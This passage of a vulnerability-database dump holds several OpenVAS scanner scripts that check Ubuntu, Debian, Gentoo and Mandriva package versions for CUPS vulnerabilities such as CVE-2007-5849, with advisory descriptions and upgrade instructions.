\"URL\" , value: \"http://www.ubuntu.com/usn/usn-563-1/\");\n script_id(840232);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"563-1\");\n script_cve_id(\"CVE-2007-5849\", \"CVE-2007-6358\");\n script_name( \"Ubuntu Update for cupsys vulnerabilities USN-563-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.2.8-0ubuntu8.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.2.4-2ubuntu3.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.2-1ubuntu7.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6358", "CVE-2007-5849"], "description": "The remote host is missing an update to cupsys\nannounced via advisory DSA 1437-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:60069", "href": "http://plugins.openvas.org/nasl.php?oid=60069", "type": "openvas", "title": "Debian Security Advisory DSA 1437-1 (cupsys)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1437_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1437-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2007-5849\n\nWei Wang discovered that an buffer overflow in the SNMP backend\nmay lead to the execution of arbitrary code.\n\nCVE-2007-6358\n\nElias Pipping discovered that insecure handling of a temporary\nfile in the pdftops.pl script may lead to local denial of service.\nThis vulnerability is not exploitable in the default configuration.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.2.7-4etch2.\n\nThe old stable distribution (sarge) is not affected by CVE-2007-5849.\nThe other issue doesn't warrant an update on it's own and has been\npostponed.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.3.5-1.\n\nWe recommend that you upgrade your cupsys packages.\";\ntag_summary = \"The remote host is missing an update to cupsys\nannounced via advisory DSA 1437-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201437-1\";\n\nif(description)\n{\n script_id(60069);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-5849\", \"CVE-2007-6358\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1437-1 (cupsys)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.7-4etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6358", "CVE-2007-4045", "CVE-2007-5849"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200712-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:60049", "href": "http://plugins.openvas.org/nasl.php?oid=60049", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200712-14 (cups)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in CUPS, allowing for the\nremote execution of arbitrary code and a Denial of Service.\";\ntag_solution = \"All CUPS users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-print/cups-1.2.12-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200712-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=199195\nhttp://bugs.gentoo.org/show_bug.cgi?id=201042\nhttp://bugs.gentoo.org/show_bug.cgi?id=201570\nhttp://www.gentoo.org/security/en/glsa/glsa-200703-28.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200712-14.\";\n\n \n\nif(description)\n{\n script_id(60049);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-4045\", \"CVE-2007-5849\", \"CVE-2007-6358\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200712-14 (cups)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-print/cups\", unaffected: make_list(\"rge 1.2.12-r4\", \"ge 1.3.5\"), vulnerable: make_list(\"lt 1.3.5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4045", "CVE-2007-0720", "CVE-2007-5849"], "description": "Check for the Version of cups", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830479", "href": "http://plugins.openvas.org/nasl.php?oid=830479", "type": "openvas", "title": "Mandriva Update for cups MDVSA-2008:036 (cups)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cups MDVSA-2008:036 (cups)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wei Wang found that the SNMP discovery backend in CUPS did not\n correctly calculate the length of strings. If a user could be tricked\n into scanning for printers, a remote attacker could send a specially\n crafted packet and possibly execute arbitrary code (CVE-2007-5849).\n\n As well, the fix for CVE-2007-0720 in MDKSA-2007:086 caused another\n denial of service regression within SSL handling (CVE-2007-4045).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"cups on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-02/msg00007.php\");\n script_id(830479);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:036\");\n script_cve_id(\"CVE-2007-5849\", \"CVE-2007-0720\", \"CVE-2007-4045\");\n script_name( \"Mandriva Update for cups MDVSA-2008:036 (cups)\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4045", "CVE-2007-0720", "CVE-2007-5849"], "description": "Check for the Version of cups", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830479", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830479", "type": "openvas", "title": "Mandriva Update for cups MDVSA-2008:036 (cups)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cups MDVSA-2008:036 (cups)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wei Wang found that the SNMP discovery backend in CUPS did not\n correctly calculate the length of strings. If a user could be tricked\n into scanning for printers, a remote attacker could send a specially\n crafted packet and possibly execute arbitrary code (CVE-2007-5849).\n\n As well, the fix for CVE-2007-0720 in MDKSA-2007:086 caused another\n denial of service regression within SSL handling (CVE-2007-4045).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"cups on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-02/msg00007.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830479\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:036\");\n script_cve_id(\"CVE-2007-5849\", \"CVE-2007-0720\", \"CVE-2007-4045\");\n script_name( \"Mandriva Update for cups MDVSA-2008:036 (cups)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone 